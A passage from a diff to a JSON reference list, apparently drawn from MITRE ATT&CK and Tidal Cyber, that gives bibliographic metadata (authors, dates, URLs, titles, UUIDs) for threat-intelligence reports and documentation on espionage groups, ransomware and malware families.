"Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.", + "meta": { + "date_accessed": "2019-08-26T00:00:00Z", + "date_published": "2018-12-05T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/" + ], + "source": "MITRE", + "title": "Cyber-espionage group uses Chrome extension to infect victims" + }, + "related": [], + "uuid": "b17acdc3-0163-4c98-b5fb-a457a7e6b58d", + "value": "Zdnet Kimsuky Dec 2018" + }, + { + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "meta": { + "date_accessed": "2017-06-18T00:00:00Z", + "date_published": "2017-05-14T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations" + }, + "related": [], + "uuid": "b72d017b-a70f-4003-b3d9-90d79aca812d", + "value": "FireEye APT32 May 2017" + }, + { + "description": "Adair, S., Moran, N. (2012, May 15). Cyber Espionage & Strategic Web Compromises – Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.", + "meta": { + "date_accessed": "2018-03-13T00:00:00Z", + "date_published": "2012-05-15T00:00:00Z", + "refs": [ + "http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/" + ], + "source": "MITRE", + "title": "Cyber Espionage & Strategic Web Compromises – Trusted Websites Serving Dangerous Results" + }, + "related": [], + "uuid": "cf531866-ac3c-4078-b847-5b4af7eb161f", + "value": "Shadowserver Strategic Web Compromise" + }, + { + "description": "Cyberknow20. (2022, July 7). CyberKnow Tweet July 7 2022. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2022-07-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/Cyberknow20/status/1545059177587871749" + ], + "source": "Tidal Cyber", + "title": "CyberKnow Tweet July 7 2022" + }, + "related": [], + "uuid": "a37564a4-ff83-4ce0-818e-80750172f302", + "value": "CyberKnow Tweet July 7 2022" + }, + { + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2019-10-21T00:00:00Z", + "refs": [ + "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf" + ], + "source": "MITRE", + "title": "Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims" + }, + "related": [], + "uuid": "3e86a807-5188-4278-9a58-babd23b86410", + "value": "NSA NCSC Turla OilRig" + }, + { + "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://www.opm.gov/cybersecurity/cybersecurity-incidents/" + ], + "source": "MITRE", + "title": "CYBERSECURITY INCIDENTS" + }, + "related": [], + "uuid": "b67ed4e9-ed44-460a-bd59-c978bdfda32f", + "value": "OPM Leak" + }, + { + "description": "ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.", + "meta": { + "date_accessed": "2023-09-28T00:00:00Z", + "date_published": "2021-11-16T00:00:00Z", + "refs": [ + "https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/" + ], + "source": "MITRE", + "title": "Cybersecurity lessons: A PATH vulnerability in Windows" + }, + "related": [], + "uuid": "26096485-1dd6-512a-a2a1-27dbbfb6fde0", + "value": "ExpressVPN PATH env Windows 2021" + }, + { + "description": "NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.", + "meta": { + "date_accessed": "2022-03-03T00:00:00Z", + "date_published": "2022-02-23T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf" + ], + "source": "MITRE", + "title": "Cyclops Blink Malware Analysis Report" + }, + "related": [], + "uuid": "91ed6adf-f066-49e4-8ec7-1989bc6615a6", + "value": "NCSC Cyclops Blink February 2022" + }, + { + "description": "Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "date_published": "2022-03-17T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html" + ], + "source": "MITRE", + "title": "Cyclops Blink Sets Sights on Asus Routers" + }, + "related": [], + "uuid": "64e9a24f-f386-4774-9874-063e0ebfb8e1", + "value": "Trend Micro Cyclops Blink March 2022" + }, + { + "description": "Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020.", + "meta": { + "date_accessed": "2020-06-29T00:00:00Z", + "date_published": "2020-04-27T00:00:00Z", + "refs": [ + "https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/" + ], + "source": "MITRE", + "title": "Cynet Detection Report: Ragnar Locker Ransomware" + }, + "related": [], + "uuid": "aeb637ea-0b83-42a0-8f68-9fdc59aa462a", + "value": "Cynet Ragnar Apr 2020" + }, + { + "description": "Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.", + "meta": { + "date_accessed": "2018-08-19T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces" + ], + "source": "MITRE", + "title": "DACLs and ACEs" + }, + "related": [], + "uuid": "32a250ca-a7eb-4d7f-af38-f3e6a09540e2", + "value": "Microsoft DACL May 2018" + }, + { + "description": "Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.", + "meta": { + "date_accessed": "2021-02-24T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "source": "MITRE", + "title": "Daemons and Services Programming Guide - Creating Launch Daemons and Agents" + }, + "related": [], + "uuid": "41311827-3d81-422a-9b07-ee8ddc2fc7f1", + "value": "Apple Developer Doco Archive Launchd" + }, + { + "description": "Huseyin Can Yuceel. (2022, October 24). Daixin Team Targets Healthcare Organizations with Ransomware Attacks. Retrieved December 1, 2023.", + "meta": { + "date_accessed": "2023-12-01T00:00:00Z", + "date_published": "2022-10-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.picussecurity.com/resource/blog/daixin-team-targets-healthcare-organizations-with-ransomware-attacks" + ], + "source": "Tidal Cyber", + "title": "Daixin Team Targets Healthcare Organizations with Ransomware Attacks" + }, + "related": [], + "uuid": "eba3b1b9-d0a0-4c03-8c14-21f7bbcc8a02", + "value": "Picus Daixin Team October 24 2022" + }, + { + "description": "Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.", + "meta": { + "date_accessed": "2021-07-07T00:00:00Z", + "date_published": "2021-04-19T00:00:00Z", + "refs": [ + "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4" + ], + "source": "MITRE", + "title": "Dancing With Shellcodes: Cracking the latest version of Guloader" + }, + "related": [], + "uuid": "87c5e84a-b96d-489d-aa10-db95b78c5a93", + "value": "Medium Eli Salem GuLoader April 2021" + }, + { + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-01-18T00:00:00Z", + "refs": [ + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Dark Caracal: Cyber-espionage at a Global Scale" + }, + "related": [], + "uuid": "c558f5db-a426-4041-b883-995ec56e7155", + "value": "Lookout Dark Caracal Jan 2018" + }, + { + "description": "Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2011-08-01T00:00:00Z", + "refs": [ + "https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack" + ], + "source": "MITRE", + "title": "Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space" + }, + "related": [], + "uuid": "ee5d2c9c-c704-4f35-baeb-055a35dd04b5", + "value": "Dark Clouds_Usenix_Mulazzani_08_2011" + }, + { + "description": "TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2014-09-03T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET" + ], + "source": "MITRE", + "title": "DARKCOMET" + }, + "related": [], + "uuid": "fb365600-4961-43ed-8292-1c07cbc530ef", + "value": "TrendMicro DarkComet Sept 2014" + }, + { + "description": "Jakob Nordenlund. (2023, September 6). DarkGate Loader delivered via Teams - Truesec. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2023-09-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams" + ], + "source": "Tidal Cyber", + "title": "DarkGate Loader delivered via Teams - Truesec" + }, + "related": [], + "uuid": "4222a06f-9528-4076-8037-a27012c2930c", + "value": "DarkGate Loader delivered via Teams - Truesec" + }, + { + "description": "Sergiu Gatlan. (2023, October 14). DarkGate malware spreads through compromised Skype accounts. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2023-10-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/" + ], + "source": "Tidal Cyber", + "title": "DarkGate malware spreads through compromised Skype accounts" + }, + "related": [], + "uuid": "313e5558-d8f9-4457-9004-810d9fa5340c", + "value": "Bleeping Computer DarkGate October 14 2023" + }, + { + "description": "Trent Bessell, Ryan Maglaque, Aira Marcelo, Jack Walsh, David Walsh. (2023, October 12). DarkGate Opens Organizations for Attack via Skype, Teams. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2023-10-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html" + ], + "source": "Tidal Cyber", + "title": "DarkGate Opens Organizations for Attack via Skype, Teams" + }, + "related": [], + "uuid": "81650f5b-628b-4e76-80d6-2c15cf70d37a", + "value": "Trend Micro DarkGate October 12 2023" + }, + { + "description": "0xToxin. (n.d.). DarkGate - Threat Breakdown Journey. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/" + ], + "source": "Tidal Cyber", + "title": "DarkGate - Threat Breakdown Journey" + }, + "related": [], + "uuid": "8a1ac4b8-05f6-4be9-a866-e3026bc92c7f", + "value": "DarkGate - Threat Breakdown Journey" + }, + { + "description": "Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.", + "meta": { + "date_accessed": "2021-12-27T00:00:00Z", + "date_published": "2021-09-29T00:00:00Z", + "refs": [ + "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" + ], + "source": "MITRE", + "title": "DarkHalo After SolarWinds: the Tomiris connection" + }, + "related": [], + "uuid": "a881a7e4-a1df-4ad2-b67f-ef03caddb721", + "value": "Kaspersky Tomiris Sep 2021" + }, + { + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "meta": { + "date_accessed": "2020-12-29T00:00:00Z", + "date_published": "2020-12-14T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + ], + "source": "MITRE", + "title": "Dark Halo Leverages SolarWinds Compromise to Breach Organizations" + }, + "related": [], + "uuid": "355cecf8-ef3e-4a6e-a652-3bf26fe46d88", + "value": "Volexity SolarWinds" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.", + "meta": { + "date_accessed": "2018-11-02T00:00:00Z", + "date_published": "2015-08-10T00:00:00Z", + "refs": [ + "https://securelist.com/darkhotels-attacks-in-2015/71713/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Darkhotel's attacks in 2015" + }, + "related": [], + "uuid": "5a45be49-f5f1-4d5b-b7da-0a2f38194ec1", + "value": "Securelist Darkhotel Aug 2015" + }, + { + "description": "Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2019-01-18T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/" + ], + "source": "MITRE", + "title": "DarkHydrus delivers new Trojan that can use Google Drive for C2 communications" + }, + "related": [], + "uuid": "eb235504-d142-4c6d-9ffd-3c0b0dd23e80", + "value": "Unit42 DarkHydrus Jan 2019" + }, + { + "description": "Falcone, R. (2018, August 07). DarkHydrus Uses Phishery to Harvest Credentials in the Middle East. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2018-08-07T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/" + ], + "source": "MITRE", + "title": "DarkHydrus Uses Phishery to Harvest Credentials in the Middle East" + }, + "related": [], + "uuid": "ab9d59c1-8ea5-4f9c-b733-b16223ffe84a", + "value": "Unit 42 Phishery Aug 2018" + }, + { + "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.", + "meta": { + "date_accessed": "2021-08-18T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware" + ], + "source": "MITRE", + "title": "Darkside Ransomware" + }, + "related": [], + "uuid": "eded380e-33e9-4fdc-8e1f-b51d650b9731", + "value": "Darkside Ransomware Cybereason" + }, + { + "description": "Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.", + "meta": { + "date_accessed": "2022-08-30T00:00:00Z", + "date_published": "2021-05-12T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/darkside-ransomware/" + ], + "source": "MITRE", + "title": "DarkSide Ransomware Gang: An Overview" + }, + "related": [], + "uuid": "5f8d49e8-22da-425f-b63b-a799b97ec2b5", + "value": "DarkSide Ransomware Gang" + }, + { + "description": "Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.", + "meta": { + "date_accessed": "2022-11-03T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/darktortilla-malware-analysis" + ], + "source": "MITRE", + "title": "DarkTortilla Malware Analysis" + }, + "related": [], + "uuid": "4b48cc22-55ac-5b61-b183-9008f7db37fd", + "value": "Secureworks DarkTortilla Aug 2022" + }, + { + "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.", + "meta": { + "date_accessed": "2020-05-15T00:00:00Z", + "date_published": "2018-12-06T00:00:00Z", + "refs": [ + "https://securelist.com/darkvishnya/89169/" + ], + "source": "MITRE, Tidal Cyber", + "title": "DarkVishnya: Banks attacked through direct connection to local network" + }, + "related": [], + "uuid": "da9ac5a7-c644-45fa-ab96-30ac6bfc9f81", + "value": "Securelist DarkVishnya Dec 2018" + }, + { + "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.", + "meta": { + "date_accessed": "2022-01-10T00:00:00Z", + "date_published": "2021-12-14T00:00:00Z", + "refs": [ + "https://www.prevailion.com/darkwatchman-new-fileless-techniques/" + ], + "source": "MITRE", + "title": "DarkWatchman: A new evolution in fileless techniques" + }, + "related": [], + "uuid": "449e7b5c-7c62-4a63-a676-80026a597fc9", + "value": "Prevailion DarkWatchman 2021" + }, + { + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-09-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Darwin’s Favorite APT Group [Blog]" + }, + "related": [], + "uuid": "15ef155b-7628-4b18-bc53-1d30be4eac5d", + "value": "Moran 2014" + }, + { + "description": "LOLBAS. (2020, December 1). DataSvcUtil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/" + ], + "source": "Tidal Cyber", + "title": "DataSvcUtil.exe" + }, + "related": [], + "uuid": "0c373780-3202-4036-8c83-f3d468155b35", + "value": "DataSvcUtil.exe - LOLBAS Project" + }, + { + "description": "Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2019-03-10T00:00:00Z", + "refs": [ + "https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc" + ], + "source": "MITRE", + "title": "Day 70: Hijacking VNC (Enum, Brute, Access and Crack)" + }, + "related": [], + "uuid": "7a58938f-058b-4c84-aa95-9c37dcdda1fb", + "value": "Hijacking VNC" + }, + { + "description": "Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1" + ], + "source": "MITRE", + "title": "DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1" + }, + "related": [], + "uuid": "88769217-57f1-46d4-977c-2cb2969db437", + "value": "Microsoft COM ACL" + }, + { + "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.", + "meta": { + "date_accessed": "2018-03-20T00:00:00Z", + "refs": [ + "https://www.dcshadow.com/" + ], + "source": "MITRE", + "title": "DCShadow" + }, + "related": [], + "uuid": "37514816-b8b3-499f-842b-2d8cce9e140b", + "value": "DCShadow Blog" + }, + { + "description": "Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2018-02-22T00:00:00Z", + "refs": [ + "https://github.com/shellster/DCSYNCMonitor" + ], + "source": "MITRE", + "title": "DCSYNCMonitor" + }, + "related": [], + "uuid": "be03c794-d9f3-4678-8198-257abf6dcdbd", + "value": "GitHub DCSYNCMonitor" + }, + { + "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2020-02-02T00:00:00Z", + "refs": [ + "http://man7.org/linux/man-pages/man1/dd.1.html" + ], + "source": "MITRE", + "title": "DD(1) User Commands" + }, + "related": [], + "uuid": "f64bee0d-e37d-45d5-9968-58e622e89bfe", + "value": "DD Man" + }, + { + "description": "ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2012-04-24T00:00:00Z", + "refs": [ + "https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new" + ], + "source": "MITRE", + "title": "DDoS Attacks on SSL: Something Old, Something New" + }, + "related": [], + "uuid": "b5de4376-0deb-45de-83a0-09df98480464", + "value": "Arbor SSLDoS April 2012" + }, + { + "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.", + "meta": { + "date_accessed": "2019-04-24T00:00:00Z", + "date_published": "2017-03-10T00:00:00Z", + "refs": [ + "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf" + ], + "source": "MITRE", + "title": "DDoS Overview and Response Guide" + }, + "related": [], + "uuid": "64341348-f448-4e56-bf78-442b92e6d435", + "value": "CERT-EU DDoS March 2017" + }, + { + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2018-12-12T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + ], + "source": "MITRE", + "title": "Dear Joohn: The Sofacy Group’s Global Campaign" + }, + "related": [], + "uuid": "540c4c33-d4c2-4324-94cd-f57646666e32", + "value": "Unit42 Sofacy Dec 2018" + }, + { + "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.", + "meta": { + "date_accessed": "2019-08-08T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8" + ], + "source": "MITRE", + "title": "Death by 1000 installers; it's all broken!" + }, + "related": [], + "uuid": "2ae99e9b-cd00-4e60-ba9e-bcc50e709e88", + "value": "Death by 1000 installers; it's all broken!" + }, + { + "description": "Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2020-08-17T00:00:00Z", + "refs": [ + "https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d" + ], + "source": "MITRE", + "title": "Death from Above: Lateral Movement from Azure to On-Prem AD" + }, + "related": [], + "uuid": "eb97d3d6-21cb-5f27-9a78-1e8576acecdc", + "value": "SpecterOps Lateral Movement from Azure to On-Prem AD 2020" + }, + { + "description": "Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.", + "meta": { + "date_accessed": "2023-08-30T00:00:00Z", + "date_published": "2023-03-02T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference" + ], + "source": "MITRE", + "title": "$DebugPreference" + }, + "related": [], + "uuid": "ece52a64-1c8d-547d-aedc-ff43d7418cd2", + "value": "Microsoft PowerShell SilentlyContinue" + }, + { + "description": "virtualization.info. (Interviewer) & Liguori, A. (Interviewee). (2006, August 11). Debunking Blue Pill myth [Interview transcript]. Retrieved November 13, 2014.", + "meta": { + "date_accessed": "2014-11-13T00:00:00Z", + "date_published": "2006-08-11T00:00:00Z", + "refs": [ + "http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html" + ], + "source": "MITRE", + "title": "Debunking Blue Pill myth [Interview transcript]" + }, + "related": [], + "uuid": "8ff8fb53-e468-4df7-b7e3-b344be1507ae", + "value": "virtualization.info 2006" + }, + { + "description": "Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.", + "meta": { + "date_accessed": "2021-12-26T00:00:00Z", + "date_published": "2018-02-13T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Deciphering Confucius: A Look at the Group's Cyberespionage Operations" + }, + "related": [], + "uuid": "d1d5a708-75cb-4d41-b2a3-d035a14ac956", + "value": "TrendMicro Confucius APT Feb 2018" + }, + { + "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.", + "meta": { + "date_accessed": "2021-11-16T00:00:00Z", + "date_published": "2021-07-01T00:00:00Z", + "refs": [ + "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/" + ], + "source": "MITRE", + "title": "Decoding malicious RTF files" + }, + "related": [], + "uuid": "82d2451b-300f-4891-b1e7-ade53dff1126", + "value": "Ciberseguridad Decoding malicious RTF files" + }, + { + "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.", + "meta": { + "date_accessed": "2018-11-02T00:00:00Z", + "date_published": "2018-04-17T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/" + ], + "source": "MITRE", + "title": "Decoding network data from a Gh0st RAT variant" + }, + "related": [], + "uuid": "4476aa0a-b1ef-4ac6-9e44-5721a0b3e92b", + "value": "Nccgroup Gh0st April 2018" + }, + { + "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.", + "meta": { + "date_accessed": "2018-07-21T00:00:00Z", + "date_published": "2017-10-13T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" + ], + "source": "MITRE", + "title": "Decoy Microsoft Word document delivers malware through a RAT" + }, + "related": [], + "uuid": "7ef0ab1f-c7d6-46fe-b489-fab4db623e0a", + "value": "MalwareBytes Template Injection OCT 2017" + }, + { + "description": "Crowdstrike. (2022, March 1). Decryptable PartyTicket Ransomware Reportedly Targeting Ukrainian Entities. Retrieved March 1, 2022.", + "meta": { + "date_accessed": "2022-03-01T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine" + ], + "source": "MITRE", + "title": "Decryptable PartyTicket Ransomware Reportedly Targeting Ukrainian Entities" + }, + "related": [], + "uuid": "8659fea7-7d65-4ee9-8ceb-cf41204b57e0", + "value": "Crowdstrike PartyTicket March 2022" + }, + { + "description": "Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part 1. Retrieved April 1, 2019.", + "meta": { + "date_accessed": "2019-04-01T00:00:00Z", + "date_published": "2017-05-03T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-1.html" + ], + "source": "MITRE", + "title": "Deep Analysis of New Emotet Variant – Part 1" + }, + "related": [], + "uuid": "2b8b6ab4-906f-4732-94f8-eaac5ec0151d", + "value": "Fortinet Emotet May 2017" + }, + { + "description": "Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2020-08-25T00:00:00Z", + "refs": [ + "https://blog.aquasec.com/container-security-tnt-container-attack" + ], + "source": "MITRE", + "title": "Deep Analysis of TeamTNT Techniques Using Container Images to Attack" + }, + "related": [], + "uuid": "ca10ad0d-1a47-4006-8f76-c2246aee7752", + "value": "Aqua TeamTNT August 2020" + }, + { + "description": "Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.", + "meta": { + "date_accessed": "2021-09-01T00:00:00Z", + "date_published": "2021-07-27T00:00:00Z", + "refs": [ + "https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation" + ], + "source": "MITRE", + "title": "Deep Dive Into a FIN8 Attack - A Forensic Investigation" + }, + "related": [], + "uuid": "aee3179e-1536-40ab-9965-1c10bdaa6dff", + "value": "Bitdefender FIN8 July 2021" + }, + { + "description": "Karl Ackerman. (2023, June 12). Deep dive into the Pikabot cyber threat. Retrieved January 11, 2024.", + "meta": { + "date_accessed": "2024-01-11T00:00:00Z", + "date_published": "2023-06-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/" + ], + "source": "Tidal Cyber", + "title": "Deep dive into the Pikabot cyber threat" + }, + "related": [], + "uuid": "f10c37d8-2efe-4d9e-8987-8978beef7e9d", + "value": "Sophos Pikabot June 12 2023" + }, + { + "description": "MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.", + "meta": { + "date_accessed": "2021-01-22T00:00:00Z", + "date_published": "2021-01-20T00:00:00Z", + "refs": 